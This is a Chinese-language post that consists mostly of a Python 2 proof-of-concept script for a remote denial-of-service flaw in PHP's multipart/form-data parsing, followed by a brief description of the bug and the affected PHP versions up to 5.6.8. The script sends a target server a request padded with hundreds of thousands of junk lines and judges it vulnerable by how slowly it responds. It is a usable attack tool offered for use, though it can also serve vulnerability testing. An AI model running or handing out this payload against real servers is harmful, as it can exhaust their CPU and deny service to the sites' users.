PHP multipart/form-data 远程DOS漏洞

import sys
import urllib,urllib2
import datetime
from optparse import OptionParser
def http_proxy(proxy_url):
    proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy
def check_php_multipartform_dos(url,post_body,headers):
    req = urllib2.Request(url)
    for key in headers.keys():
        req.add_header(key,headers[key])
    starttime = datetime.datetime.now();
    fd = urllib2.urlopen(req,post_body)
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime=(endtime - starttime).seconds
    if(usetime > 5):
        result = url+" is vulnerable";
    else:
        if(usetime > 3):
            result = "need to check normal respond time"
    return [result,usetime]
#end
def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                  dest="target",
                  default=False,
                  type="string",
                  help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
        target = options.target
    else:
        return;
    Num=350000
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
            'Accept-Encoding':'gzip, deflate',
            'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = 
"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: 
form-data; name=\"file\"; filename=sp.jpg"
    payload=""
    for i in range(0,Num):
        payload = payload + "a\n"
    body = body + payload;
body = body + 
"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------
WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";
if __name__=="__main__":
    main()

　　

PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞，导致PHP大量重复分配和拷贝内存的操作，可能造成CPU资源占用100%并持续较长时间，这可能造成远程拒绝服务攻击。受影响的软件及系统：PHP 5.0.0 - 5.0.5；PHP 5.1.0 - 5.1.6；PHP 5.2.0 - 5.2.17；PHP 5.3.0 - 5.3.29；PHP 5.4.0 - 5.4.40；PHP 5.5.0 - 5.5.24；PHP 5.6.0 - 5.6.8